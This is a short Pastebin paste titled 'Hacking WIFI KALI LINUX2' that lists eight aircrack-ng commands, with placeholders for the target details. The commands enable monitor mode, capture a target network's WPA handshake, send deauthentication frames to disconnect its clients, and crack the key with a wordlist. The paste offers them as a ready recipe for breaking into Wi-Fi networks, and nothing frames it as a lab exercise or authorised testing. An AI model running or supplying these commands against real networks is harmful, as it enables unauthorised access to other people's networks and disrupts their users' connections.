NEO_KOYE

Hacking WIFI KALI LINUX2

Aug 15th, 2015
626
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. airmon-ng start wlan0
  2. airodump-ng wlan0mon
  3. airmon-ng stop wlan0
  4. airmon-ng check kill
  5. airodump-ng --bssid xxxx -c xxxx --write /root/Desktop/neo wlan0mon
  6. aireplay-ng --deauth 10 -a xxxx wlan0mon
  7. cd Desktop
  8. aircrack-ng -w xxxx.txt -b xxxx xxxx
Add Comment
Please, Sign In to add comment